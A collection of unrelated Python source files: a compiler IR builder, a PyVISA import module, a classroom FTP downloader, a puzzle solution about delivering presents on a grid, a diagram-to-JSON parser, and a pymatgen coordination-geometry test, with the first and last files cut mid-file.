            # -1 marks "before the block": instructions emitted now are
            # parked on the orphan list until a real position exists.
            self.__insertion_point_idx = -1
            self.__current_bb = ip
        elif isinstance(ip, Instruction):
            self.__insertion_point = ip
            self.__insertion_point_idx = ip.parent.find_instruction_idx(ip)
            if self.__insertion_point_idx is None:
                raise InvalidInstructionException("Could not find instruction in its parent basic block")
            # Step one slot back, clamping at the start of the block (the
            # old code special-cased index 0 with a no-op branch).
            self.__insertion_point_idx = max(0, self.__insertion_point_idx - 1)
        else:
            raise InvalidTypeException("Expected either Basic Block or Instruction")

    def __add_instruction(self, inst):
        """Insert `inst` at the current insertion point and advance it."""
        if self.__insertion_point_idx == -1:
            # No concrete position yet: keep the instruction as an orphan.
            self.__orphaned_instructions.append(inst)
        elif isinstance(self.__insertion_point, BasicBlock):
            self.__insertion_point.instructions.append(inst)
            # Track the real index of the appended instruction so follow-up
            # insertions land right after it (the old code left the index at
            # 0, which misplaced subsequent instructions in non-empty blocks).
            self.__insertion_point_idx = len(self.__insertion_point.instructions) - 1
            self.__insertion_point = inst
        elif isinstance(self.__insertion_point, Instruction):
            bb = self.__insertion_point.parent
            bb.instructions.insert(self.__insertion_point_idx + 1, inst)
            self.__insertion_point_idx += 1
            self.__insertion_point = inst
        else:
            raise Exception("Could not add instruction")

    def const_fold_binary_op(self, lhs, rhs, op):
        """Constant-fold `lhs op rhs` when possible.

        Folding is currently disabled: always returns None so callers emit
        the real instruction.
        """
        return None
        # if isinstance(lhs, Number) and isinstance(rhs, Number):
        #     lhs = lhs.number
        #     rhs = rhs.number
        #     result = BINARY_OPERATORS[op](lhs, rhs)
        #     return Number(result)
        # else:
        #     return None

    def __create_binary_op(self, inst_cls, op, lhs, rhs, name):
        """Emit a binary instruction of `inst_cls`, or its folded constant.

        Shared implementation of all create_<binop> helpers below.
        """
        folded_inst = self.const_fold_binary_op(lhs, rhs, op)
        if folded_inst is not None:
            return folded_inst
        inst = inst_cls(lhs, rhs, self.__current_bb, name)
        self.__add_instruction(inst)
        return inst

    def create_function(self, name, args):
        """Create a Function, register it on the module, and return it."""
        f = Function(name, args)
        self.__module.functions[name] = f
        return f

    def set_entry_point(self, function):
        """Mark `function` as the module's entry point."""
        self.__module.entry_point = function

    def create_global(self, name, initializer):
        """Create a Global with `initializer` and add it to the module."""
        g = Global(name, initializer)
        self.__module.add_global(g)

    def create_basic_block(self, name, parent):
        """Create and return a new basic block (not yet an insertion point)."""
        bb = BasicBlock(name, parent)
        return bb

    def create_return(self, value=None, name=None):
        """Emit a return of `value` (None for a void return)."""
        ret_inst = ReturnInstruction(value)
        self.__add_instruction(ret_inst)
        # Returning the instruction keeps this consistent with the other
        # create_* helpers (the old version returned None).
        return ret_inst

    def create_branch(self, bb, name=None):
        """Emit an unconditional branch to basic block `bb`."""
        if not isinstance(bb, BasicBlock):
            raise InvalidTypeException("Expected a Basic Block")
        branch_inst = BranchInstruction(bb, self.__current_bb, name)
        self.__add_instruction(branch_inst)
        return branch_inst

    def create_cond_branch(self, cmp_inst, value, bb_true, bb_false, name=None):
        """Emit a conditional branch selecting bb_true / bb_false."""
        cond_branch = ConditionalBranchInstruction(cmp_inst, value, bb_true, bb_false, self.__current_bb, name)
        self.__add_instruction(cond_branch)
        return cond_branch

    def create_call(self, func, args, name=None):
        """Emit a call to `func` with `args`."""
        call_inst = CallInstruction(func, args, self.__current_bb, name)
        self.__add_instruction(call_inst)
        return call_inst

    def create_add(self, lhs, rhs, name=None):
        """Emit lhs + rhs (or its constant-folded value)."""
        return self.__create_binary_op(AddInstruction, '+', lhs, rhs, name)

    def create_sub(self, lhs, rhs, name=None):
        """Emit lhs - rhs (or its constant-folded value)."""
        return self.__create_binary_op(SubInstruction, '-', lhs, rhs, name)

    def create_mul(self, lhs, rhs, name=None):
        """Emit lhs * rhs (or its constant-folded value)."""
        return self.__create_binary_op(MulInstruction, '*', lhs, rhs, name)

    def create_div(self, lhs, rhs, name=None):
        """Emit lhs / rhs (or its constant-folded value)."""
        return self.__create_binary_op(DivInstruction, '/', lhs, rhs, name)

    def create_icmp(self, lhs, rhs, comparator, name=None):
        """Emit an integer comparison of `lhs` and `rhs` using `comparator`.

        Bug fix: `comparator` used to be ignored and CompareTypes.SLE was
        hard-coded; the caller-supplied comparator is now honoured.
        """
        icmp_inst = ICmpInstruction(comparator, lhs, rhs, self.__current_bb, name)
        self.__add_instruction(icmp_inst)
        return icmp_inst

    def create_select(self, cond, val_true, val_false, name=None):
        """Emit a select of `val_true` / `val_false` on `cond`."""
        select_inst = SelectInstruction(cond, val_true, val_false, self.__current_bb, name)
        self.__add_instruction(select_inst)
        return select_inst

    def create_alloca(self, numEls=None, name=None):
        """Emit a stack allocation of `numEls` elements."""
        alloca_inst = AllocaInstruction(numEls, self.__current_bb, name)
        self.__add_instruction(alloca_inst)
        return alloca_inst

    def create_load(self, alloca):
        """Emit a load from `alloca`."""
        load_inst = LoadInstruction(alloca, parent=self.__current_bb)
        self.__add_instruction(load_inst)
        return load_inst

    def create_store(self, alloca, value):
        """Emit a store of `value` into `alloca`."""
        store_inst = StoreInstruction(alloca, value, parent=self.__current_bb)
        self.__add_instruction(store_inst)
        return store_inst

    def create_shl(self, op1, op2, name=None):
        """Emit op1 << op2 (or its constant-folded value)."""
        return self.__create_binary_op(ShiftLeftInstruction, '<<', op1, op2, name)

    def create_lshr(self, op1, op2, name=None):
        """Emit a logical right shift op1 >> op2 (or its folded value)."""
        return self.__create_binary_op(LogicalShiftRightInstruction, '>>', op1, op2, name)

    def create_ashr(self, op1, op2, name=None):
        """Emit an arithmetic right shift. No folding: BINARY_OPERATORS has
        no arithmetic-shift entry."""
        ashr_inst = ArithmeticShiftRightInstruction(op1, op2, self.__current_bb, name)
        self.__add_instruction(ashr_inst)
        return ashr_inst

    def create_and(self, op1, op2, name=None):
        """Emit op1 & op2 (or its constant-folded value)."""
        return self.__create_binary_op(AndInstruction, '&', op1, op2, name)

    def create_or(self, op1, op2, name=None):
        """Emit op1 | op2 (or its constant-folded value)."""
        return self.__create_binary_op(OrInstruction, '|', op1, op2, name)

    def create_xor(self, op1, op2, name=None):
        """Emit op1 ^ op2 (or its constant-folded value)."""
        return self.__create_binary_op(XorInstruction, '^', op1, op2, name)

    def create_number(self, number):
        """Wrap a raw value in a Number constant."""
        number = Number(number)
        return number

    def create_string(self, string):
        """Wrap a raw value in a String constant."""
        string_obj = String(string)
        return string_obj

    #def create_vector(self, baseTy, numElts, name=None):
    #    vecTy = VectorType(baseTy, numElts)
    #    alloca = self.create_alloca(vecTy, 1, None, name)
    #    vec = self.create_load(alloca)
    #    return vec
|
"""
pyvisa.visa
~~~~~~~~~~~
Module to provide an import shortcut for the most common VISA operations.
This file is part of PyVISA.
:copyright: 2014 by PyVISA Authors, see AUTHORS for more details.
:license: MIT, see COPYING for more details.
"""
from __future__ import division, unicode_literals, print_function, absolute_import
from pyvisa import logger, __version__, log_to_screen, constants
from pyvisa.highlevel import ResourceManager
from pyvisa.errors import (Error, VisaIOError, VisaIOWarning, VisaTypeError,
UnknownHandler, OSNotSupported, InvalidBinaryFormat,
InvalidSession, LibraryError)
from pyvisa.resources import Resource
if __name__ == '__main__':
    # Tiny CLI front-end: `info` prints diagnostics, `shell` starts the
    # interactive PyVISA console, optionally against a specific backend.
    import argparse
    parser = argparse.ArgumentParser(description='PyVISA command-line utilities')
    parser.add_argument('--backend', '-b', dest='backend', action='store', default=None,
                        help='backend to be used (default: ni)')
    subparsers = parser.add_subparsers(title='command', dest='command')
    subparsers.add_parser('info', help='print information to diagnose PyVISA')
    subparsers.add_parser('shell', help='start the PyVISA console')
    args = parser.parse_args()
    if args.command == 'info':
        from pyvisa import util
        util.get_debug_info()
    elif args.command == 'shell':
        from pyvisa import shell
        # The '@backend' suffix selects the backend; empty string = default.
        backend_spec = '@' + args.backend if args.backend else ''
        shell.main(backend_spec)
|
"""
Created on Sat May 21 16:43:47 2016
@author: Pratik
"""
from ftplib import FTP
import os
def ftpDownloader(filename, host="ftp.pyclass.com", user="student@pyclass.com",
                  passwd="student123", remote_dir="Data",
                  local_dir="/Users/Pratik/Documents/Pratik/Work/practice/py-data-analysis"):
    """Download `filename` from an FTP server into `local_dir`.

    Args:
        filename: name of the remote file to fetch (also used locally).
        host, user, passwd: FTP connection credentials.
        remote_dir: directory on the server to change into (was hard-coded).
        local_dir: local directory to save into (was hard-coded).

    The defaults preserve the original behaviour; the connection is now
    always closed, even when the transfer fails.
    """
    ftp = FTP(host)                        # connect to the host
    try:
        ftp.login(user, passwd)            # login with username and password
        ftp.cwd(remote_dir)                # change remote directory
        os.chdir(local_dir)                # change local working directory
        print(ftp.nlst())                  # print list of all files in dir
        with open(filename, 'wb') as file:  # open local file for binary write
            # stream the remote file's bytes into our local file
            ftp.retrbinary('RETR %s' % filename, file.write)
    finally:
        # Fix: the connection was previously never closed.
        ftp.close()
|
class PresentDeliverer:
    """Tracks a present deliverer walking a 2-D grid of houses.

    ``present_locations`` is deliberately a *class* attribute: every
    deliverer drops presents into the same shared map, so
    ``unique_houses()`` reports houses visited by all deliverers combined.
    """
    # Shared across all instances: "x-y" key -> 1 for each visited house.
    present_locations = {}

    # Instruction character -> (dx, dy). Anything that is not '>', '<' or
    # '^' (e.g. 'v') moves one step south, matching the original if/elif.
    _STEPS = {'>': (1, 0), '<': (-1, 0), '^': (0, 1)}

    def __init__(self, name):
        self.name = name
        self.x = 0
        self.y = 0
        # The starting house also receives a present.
        self.present_locations[self.get_key()] = 1

    def get_key(self):
        """Return the current position encoded as an "x-y" string."""
        return "%d-%d" % (self.x, self.y)

    def status(self):
        """Print the deliverer's name and current coordinates."""
        print("%s x: %d y: %d" % (self.name, self.x, self.y))

    def move(self, instruction):
        """Apply one instruction character and drop a present."""
        dx, dy = self._STEPS.get(instruction, (0, -1))
        self.x += dx
        self.y += dy
        self.present_locations[self.get_key()] = 1

    def unique_houses(self):
        """Print how many distinct houses received at least one present."""
        print("Unique houses: %d" % len(self.present_locations))
# Forward slashes work on Windows as well as POSIX and avoid accidental
# backslash escapes; the old "..\inputs\..." literal only worked on Windows.
filename = "../inputs/day_three_input.txt"
santa = PresentDeliverer("Santa")
robo = PresentDeliverer("RoboSanta")
# Fix: the input file was previously never closed.
with open(filename) as f:
    input_line = f.readline()
# Odd instructions go to Santa, even ones to RoboSanta.
for instruction_count, c in enumerate(input_line, start=1):
    if instruction_count % 2:
        santa.move(c)
    else:
        robo.move(c)
santa.unique_houses()
|
import json
from sets import Set
from sys import maxint
import math
def norm2(a):
    """Squared Euclidean length of the 3-vector `a` (i.e. a . a)."""
    return a[0] * a[0] + a[1] * a[1] + a[2] * a[2]
def dot(a, b):
    """Dot product of the first three components of `a` and `b`."""
    return sum(a[i] * b[i] for i in range(3))
def area(a, b, c):
    """Area of the triangle with 3-D corners `a`, `b`, `c`.

    Uses |u x v|^2 = |u|^2 |v|^2 - (u.v)^2 on the edge vectors u = b - a
    and v = c - a; the triangle is half the parallelogram.
    """
    u = [b[i] - a[i] for i in range(3)]
    v = [c[i] - a[i] for i in range(3)]
    uu = u[0] * u[0] + u[1] * u[1] + u[2] * u[2]
    vv = v[0] * v[0] + v[1] * v[1] + v[2] * v[2]
    uv = u[0] * v[0] + u[1] * v[1] + u[2] * v[2]
    return math.sqrt(uu * vv - uv * uv) * 0.5
class DiagramJson:
    """Skeleton of the JSON document for a form/force diagram pair.

    The structure is filled in by Txt2JsonParser and finally serialized
    with json.dump.
    """
    def __init__(self):
        # Form diagram: geometry plus cross-references into the force diagram.
        form = {}
        form['vertices'] = {}
        form['vertices_2_force_faces'] = {}  # face array
        form['vertices_2_force_cells'] = {}
        form['vertices_external'] = None     # converted from set: vid: 1
        form['edges'] = {}
        # Force diagram: plain geometry keyed by id.
        force = {}
        for key in ('vertices', 'edges', 'faces_e', 'faces_v', 'cells'):
            force[key] = {}
        self.json = {
            'form': form,
            'force': force,
            # Running min/max of face areas, used to scale edge widths.
            'strength_scaler': {'min': maxint, 'max': 0},
            'force_face_2_strength': {},
        }
class Txt2JsonParser:
    """Parses tab-separated txt exports of a form/force diagram pair and
    fills a DiagramJson structure for serialization.

    The read* methods are meant to be called in order: form vertices,
    form edges, force vertices, force edges, then force face vertices
    (which computes the strengths). Python 2 module (print statement,
    list-returning map).
    """
    def __init__(self):
        self.diagramJson = DiagramJson()
        # # tmp data structures used only when parsing
        # self.form_edge_2_vertex = {}
        self.force_face_2_form_edge = {} # inverse index, for calculating edge width i.e. area of faces (strength)
        # self.form_vertex_external_count = {} # vid: count - 0, 1, 2
    def readFormVertex(self, filename):
        """Read form vertices: each line is a vertex id followed by its
        (float) coordinates, tab-separated. Also prepares an empty
        force-face list per vertex in vertices_2_force_faces."""
        f = open(filename)
        v = self.diagramJson.json['form']['vertices']
        v2fa = self.diagramJson.json['form']['vertices_2_force_faces']
        for line in f:
            vertex = line.strip().split('\t')
            # print vertex
            v[vertex[0]] = map(float, vertex[1:])
            # create array for form_vertices to force_face array (cells)
            v2fa[vertex[0]] = []
        # print self.diagramJson.json
        f.close()
    def readFormEdge(self, filename_edge_vertex, filename_edge_to_force_face, filename_edge_ex):
        """Read form edges from three files: edge -> endpoint vertices,
        edge -> force face ("Null" means none), and the list of external
        edges. Flags edges with exactly one external endpoint as carrying
        an external force ('ex_force')."""
        f_edge_vertex = open(filename_edge_vertex)
        edges = self.diagramJson.json['form']['edges']
        for line in f_edge_vertex:
            edge = line.strip().split('\t')
            e = edges[edge[0]] = {}
            e['vertex'] = edge[1:]
            # e['external'] = False
            # print edge[0], e['vertex']
        # print edges
        f_edge_vertex.close()
        v2fa = self.diagramJson.json['form']['vertices_2_force_faces']
        f_edge_to_force_face = open(filename_edge_to_force_face)
        for line in f_edge_to_force_face:
            edge = line.strip().split('\t')
            f = edge[1] if edge[1] != "Null" else None
            edges[edge[0]]['force_face'] = f
            edge_vertex = edges[edge[0]]['vertex']
            for v in edge_vertex:
                v2fa[v].append(f)
            # force_face_2_form_edge (tmp structure) for compute strength
            if f != None:
                self.force_face_2_form_edge[f] = edge[0]
        f_edge_to_force_face.close()
        vertex_ex_set = Set()
        f_edge_ex = open(filename_edge_ex)
        for line in f_edge_ex:
            edge = line.strip().split('\t')
            for e in edge:
                edges[e]['external'] = True
                vertex_ex_set.add(edges[e]['vertex'][0])
                vertex_ex_set.add(edges[e]['vertex'][1])
        f_edge_ex.close()
        self.diagramJson.json['form']['vertices_external'] = dict.fromkeys(vertex_ex_set, 1)
        # label external force edge
        for e in edges:
            is_ex_vertex_0 = edges[e]['vertex'][0] in vertex_ex_set
            is_ex_vertex_1 = edges[e]['vertex'][1] in vertex_ex_set
            if is_ex_vertex_0 != is_ex_vertex_1:
                # print edges[e]['vertex'][0], ':', is_ex_vertex_0, ' , ', edges[e]['vertex'][1], ':', is_ex_vertex_1
                # force vector: from v0 to v1
                edges[e]['ex_force'] = True
        # print edges
        # print self.diagramJson.json
    def readForceVertex(self, filename):
        """Read force-diagram vertices (same tab-separated layout as
        readFormVertex, without the force-face bookkeeping)."""
        f = open(filename)
        v = self.diagramJson.json['force']['vertices']
        for line in f:
            vertex = line.strip().split('\t')
            # print vertex
            v[vertex[0]] = map(float, vertex[1:])
        # print self.diagramJson.json
        f.close()
    def readForceEdge(self, filename_edge_vertex):
        """Read force edges: edge id -> list of endpoint vertex ids."""
        f_edge_vertex = open(filename_edge_vertex)
        edges = self.diagramJson.json['force']['edges']
        for line in f_edge_vertex:
            edge = line.strip().split('\t')
            edges[edge[0]] = edge[1:]
        # print edges
        f_edge_vertex.close()
        # print self.diagramJson.json
    def readForceFaceEdge(self, filename_face_edge):
        """Read force faces as edge lists (face id -> edge ids).
        Currently unused by the main script, which reads faces as vertex
        lists instead (readForceFaceVertex)."""
        f_face_edge = open(filename_face_edge)
        edges = self.diagramJson.json['force']['edges']
        faces_e = self.diagramJson.json['force']['faces_e']
        # faces_v = self.diagramJson.json['force']['faces_v']
        for line in f_face_edge:
            face = line.strip().split('\t')
            faces_e[face[0]] = face[1:]
            # # convert face edge to face vertex
            # cur_face_vertex = Set()
            # for e in face[1:]:
            #     # extend vertex array
            #     # cur_face_vertex.extend(edges[e])
            #     for v in edges[e]:
            #         cur_face_vertex.add(v)
            # faces_v[face[0]] = list(cur_face_vertex)
            # print faces_v[face[0]]
        f_face_edge.close()
        # print self.diagramJson.json
    def readForceFaceVertex(self, filename_face_vertex):
        """Read force faces as (fan-ordered) vertex lists and compute each
        face's area, the "strength" of the corresponding form edge.

        Updates the global strength min/max, skipping faces whose form
        edge is external or carries an external force."""
        f_face_vertex = open(filename_face_vertex)
        # fan shape order
        faces_v = self.diagramJson.json['force']['faces_v']
        strengthScaler = self.diagramJson.json['strength_scaler']
        force_face_2_strength = self.diagramJson.json['force_face_2_strength']
        v = self.diagramJson.json['force']['vertices']
        e = self.diagramJson.json['form']['edges']
        for line in f_face_vertex:
            face = line.strip().split('\t')
            faces_v[face[0]] = face[1:]
            strength = 0
            if len(face) == 4:
                # tri
                strength = area( v[face[1]], v[face[2]], v[face[3]] )
            elif len(face) == 5:
                # quad: split into two triangles sharing the 1-3 diagonal
                strength = area( v[face[1]], v[face[2]], v[face[3]] ) + area( v[face[1]], v[face[3]], v[face[4]] )
            else:
                print 'Error: face ', face[0], ' is not tri or quad!!'
            # if face[0] == '17f' or face[0] == '19f':
            #     print face[0], face[1:], map( lambda vid: v[vid], face[1:] ), area(v[face[1]], v[face[2]], v[face[3]]), strength
            # e[ self.force_face_2_form_edge[face[0]] ]['strength'] = strength
            force_face_2_strength[ face[0] ] = strength
            curEdge = e[ self.force_face_2_form_edge[face[0]] ]
            if 'external' not in curEdge and 'ex_force' not in curEdge:
                strengthScaler['max'] = max(strength, strengthScaler['max'])
                strengthScaler['min'] = min(strength, strengthScaler['min'])
        f_face_vertex.close()
if __name__ == "__main__":
    # Pick the example data set to convert (example_01 .. example_04).
    foldername = "example_04"
    parser = Txt2JsonParser()
    parser.readFormVertex(foldername + "/form_v.txt")
    parser.readFormEdge(foldername + "/form_e_v.txt",
                        foldername + "/form_e_to_force_f.txt",
                        foldername + "/form_e_ex.txt")
    parser.readForceVertex(foldername + "/force_v.txt")
    parser.readForceEdge(foldername + "/force_e_v.txt")
    # Faces are read as vertex lists; the edge-list variant is unused:
    # parser.readForceFaceEdge(foldername + "/force_f_e.txt")
    parser.readForceFaceVertex(foldername + "/force_f_v.txt")
    with open(foldername + '/diagram.json', 'w') as out:
        json.dump(parser.diagramJson.json, out)
|
__author__ = 'waroquiers'
import unittest
import numpy as np
from pymatgen.util.testing import PymatgenTest
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import ExplicitPermutationsAlgorithm
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import SeparationPlane
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import AllCoordinationGeometries
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import CoordinationGeometry
# Module-level instance built once and shared by all tests below.
allcg = AllCoordinationGeometries()
class FakeSite:
    """Minimal stand-in for a pymatgen Site; exposes only `coords`."""
    def __init__(self, coords):
        # Coordinates of the fake site (sequence of 3 floats in these tests).
        self.coords = coords
class CoordinationGeometriesTest(PymatgenTest):
    """Tests for the chemenv coordination-geometry classes: algorithm
    dict round-trips, neighbor-set hints, and the full geometry catalogue
    (string forms, faces/edges, queries on `allcg`)."""
    def test_algorithms(self):
        """Round-trip algorithms through as_dict/from_dict and check the
        octahedron's separation-plane algorithms."""
        expl_algo = ExplicitPermutationsAlgorithm(permutations=[[0, 1, 2], [1, 2, 3]])
        # NOTE(review): `as_dict` is accessed without parentheses (as a
        # property) here and below; this matches the pymatgen version these
        # tests target — confirm on upgrade.
        expl_algo2 = ExplicitPermutationsAlgorithm.from_dict(expl_algo.as_dict)
        self.assertEqual(expl_algo.permutations, expl_algo2.permutations)
        sepplane_algos_oct = allcg['O:6'].algorithms
        self.assertEqual(len(sepplane_algos_oct[0].safe_separation_permutations()), 24)
        self.assertEqual(len(sepplane_algos_oct[1].safe_separation_permutations()), 36)
        sepplane_algos_oct_0 = SeparationPlane.from_dict(sepplane_algos_oct[0].as_dict)
        self.assertEqual(sepplane_algos_oct[0].plane_points, sepplane_algos_oct_0.plane_points)
        self.assertEqual(sepplane_algos_oct[0].mirror_plane, sepplane_algos_oct_0.mirror_plane)
        self.assertEqual(sepplane_algos_oct[0].ordered_plane, sepplane_algos_oct_0.ordered_plane)
        self.assertEqual(sepplane_algos_oct[0].point_groups, sepplane_algos_oct_0.point_groups)
        self.assertEqual(sepplane_algos_oct[0].ordered_point_groups, sepplane_algos_oct_0.ordered_point_groups)
        self.assertTrue(all([np.array_equal(perm, sepplane_algos_oct_0.explicit_optimized_permutations[iperm])
                             for iperm, perm in enumerate(sepplane_algos_oct[0].explicit_optimized_permutations)]))
        self.assertEqual(sepplane_algos_oct[0].__str__(),
                         'Separation plane algorithm with the following reference separation :\n'
                         '[[4]] | [[0, 2, 1, 3]] | [[5]]')
    def test_hints(self):
        """A csm above csm_max yields no hints; hints survive a dict round-trip."""
        hints = CoordinationGeometry.NeighborsSetsHints(hints_type='single_cap',
                                                        options={'cap_index': 2, 'csm_max': 8})
        myhints = hints.hints({'csm': 12.0})
        self.assertEqual(myhints, [])
        hints2 = CoordinationGeometry.NeighborsSetsHints.from_dict(hints.as_dict())
        self.assertEqual(hints.hints_type, hints2.hints_type)
        self.assertEqual(hints.options, hints2.options)
    def test_coordination_geometry(self):
        """Exercise the octahedron geometry end-to-end (string form, symbols,
        permutations, faces/edges/solid angles, pmesh export) and the
        catalogue-wide queries on `allcg`."""
        cg_oct = allcg['O:6']
        cg_oct2 = CoordinationGeometry.from_dict(cg_oct.as_dict())
        self.assertArrayAlmostEqual(cg_oct.central_site, cg_oct2.central_site)
        self.assertArrayAlmostEqual(cg_oct.points, cg_oct2.points)
        self.assertEqual(cg_oct.__str__(), 'Coordination geometry type : Octahedron (IUPAC: OC-6 || IUCr: [6o])\n'
                                           '\n'
                                           '  - coordination number : 6\n'
                                           '  - list of points :\n'
                                           '    - [0.0, 0.0, 1.0]\n'
                                           '    - [0.0, 0.0, -1.0]\n'
                                           '    - [1.0, 0.0, 0.0]\n'
                                           '    - [-1.0, 0.0, 0.0]\n'
                                           '    - [0.0, 1.0, 0.0]\n'
                                           '    - [0.0, -1.0, 0.0]\n'
                                           '------------------------------------------------------------\n')
        self.assertEqual(cg_oct.__len__(), 6)
        self.assertEqual(cg_oct.ce_symbol, cg_oct.mp_symbol)
        self.assertTrue(cg_oct.is_implemented())
        self.assertEqual(cg_oct.get_name(), 'Octahedron')
        self.assertEqual(cg_oct.IUPAC_symbol, 'OC-6')
        self.assertEqual(cg_oct.IUPAC_symbol_str, 'OC-6')
        self.assertEqual(cg_oct.IUCr_symbol, '[6o]')
        self.assertEqual(cg_oct.IUCr_symbol_str, '[6o]')
        cg_oct.permutations_safe_override = True
        self.assertEqual(cg_oct.number_of_permutations, 720.0)
        self.assertEqual(cg_oct.ref_permutation([0, 3, 2, 4, 5, 1]), (0, 3, 1, 5, 2, 4))
        sites = [FakeSite(coords=pp) for pp in cg_oct.points]
        faces = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
                 [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [0.0, -1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]],
                 [[-1.0, 0.0, 0.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[-1.0, 0.0, 0.0], [1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
                 [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, -1.0, 0.0]],
                 [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, -1.0]]]
        self.assertArrayAlmostEqual(cg_oct.faces(sites=sites, permutation=[0, 3, 2, 4, 5, 1]), faces)
        faces = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                 [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                 [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]]]
        self.assertArrayAlmostEqual(cg_oct.faces(sites=sites), faces)
        edges = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0]],
                 [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [0.0, 0.0, -1.0]],
                 [[-1.0, 0.0, 0.0], [1.0, 0.0, 0.0]],
                 [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                 [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[-1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
                 [[1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[1.0, 0.0, 0.0], [0.0, 0.0, -1.0]],
                 [[0.0, 1.0, 0.0], [0.0, -1.0, 0.0]],
                 [[0.0, 1.0, 0.0], [0.0, 0.0, -1.0]]]
        self.assertArrayAlmostEqual(cg_oct.edges(sites=sites, permutation=[0, 3, 2, 4, 5, 1]), edges)
        edges = [[[0.0, 0.0, 1.0], [1.0, 0.0, 0.0]],
                 [[0.0, 0.0, 1.0], [-1.0, 0.0, 0.0]],
                 [[0.0, 0.0, 1.0], [0.0, 1.0, 0.0]],
                 [[0.0, 0.0, 1.0], [0.0, -1.0, 0.0]],
                 [[0.0, 0.0, -1.0], [1.0, 0.0, 0.0]],
                 [[0.0, 0.0, -1.0], [-1.0, 0.0, 0.0]],
                 [[0.0, 0.0, -1.0], [0.0, 1.0, 0.0]],
                 [[0.0, 0.0, -1.0], [0.0, -1.0, 0.0]],
                 [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                 [[1.0, 0.0, 0.0], [0.0, -1.0, 0.0]],
                 [[-1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
                 [[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0]]]
        self.assertArrayAlmostEqual(cg_oct.edges(sites=sites), edges)
        self.assertArrayAlmostEqual(cg_oct.solid_angles(),
                                    [2.0943951, 2.0943951, 2.0943951, 2.0943951, 2.0943951, 2.0943951])
        pmeshes = cg_oct.get_pmeshes(sites=sites)
        self.assertEqual(pmeshes[0]['pmesh_string'],
                         '14\n     0.00000000      0.00000000      1.00000000\n'
                         '     0.00000000      0.00000000     -1.00000000\n'
                         '     1.00000000      0.00000000      0.00000000\n'
                         '    -1.00000000      0.00000000      0.00000000\n'
                         '     0.00000000      1.00000000      0.00000000\n'
                         '     0.00000000     -1.00000000      0.00000000\n'
                         '     0.33333333      0.33333333      0.33333333\n'
                         '     0.33333333     -0.33333333      0.33333333\n'
                         '    -0.33333333      0.33333333      0.33333333\n'
                         '    -0.33333333     -0.33333333      0.33333333\n'
                         '     0.33333333      0.33333333     -0.33333333\n'
                         '     0.33333333     -0.33333333     -0.33333333\n'
                         '    -0.33333333      0.33333333     -0.33333333\n'
                         '    -0.33333333     -0.33333333     -0.33333333\n'
                         '8\n4\n0\n2\n4\n0\n4\n0\n2\n5\n0\n4\n0\n3\n4\n0\n'
                         '4\n0\n3\n5\n0\n4\n1\n2\n4\n1\n4\n1\n2\n5\n1\n4\n'
                         '1\n3\n4\n1\n4\n1\n3\n5\n1\n')
        allcg_str = allcg.__str__()
        self.assertTrue('\n#=======================================================#\n'
                        '# List of coordination geometries currently implemented #\n'
                        '#=======================================================#\n'
                        '\nCoordination geometry type : Single neighbor (IUCr: [1l])\n\n'
                        '  - coordination number : 1\n'
                        '  - list of points :\n'
                        '    - [0.0, 0.0, 1.0]\n'
                        '------------------------------------------------------------\n\n' in allcg_str)
        self.assertTrue('Coordination geometry type : Trigonal plane (IUPAC: TP-3 || IUCr: [3l])\n\n'
                        '  - coordination number : 3\n'
                        '  - list of points :\n' in allcg_str)
        all_symbols = [u'S:1', u'L:2', u'A:2', u'TL:3', u'TY:3', u'TS:3', u'T:4', u'S:4', u'SY:4', u'SS:4',
                       u'PP:5', u'S:5', u'T:5', u'O:6', u'T:6', u'PP:6', u'PB:7', u'ST:7', u'ET:7', u'FO:7',
                       u'C:8', u'SA:8', u'SBT:8', u'TBT:8', u'DD:8', u'DDPN:8', u'HB:8', u'BO_1:8', u'BO_2:8',
                       u'BO_3:8', u'TC:9', u'TT_1:9', u'TT_2:9', u'TT_3:9', u'HD:9', u'TI:9', u'SMA:9', u'SS:9',
                       u'TO_1:9', u'TO_2:9', u'TO_3:9', u'PP:10', u'PA:10', u'SBSA:10', u'MI:10', u'S:10',
                       u'H:10', u'BS_1:10', u'BS_2:10', u'TBSA:10', u'PCPA:11', u'H:11', u'SH:11', u'CO:11',
                       u'DI:11', u'I:12', u'PBP:12', u'TT:12', u'C:12', u'AC:12', u'SC:12', u'S:12', u'HP:12',
                       u'HA:12', u'SH:13', u'DD:20', u'UNKNOWN', u'UNCLEAR']
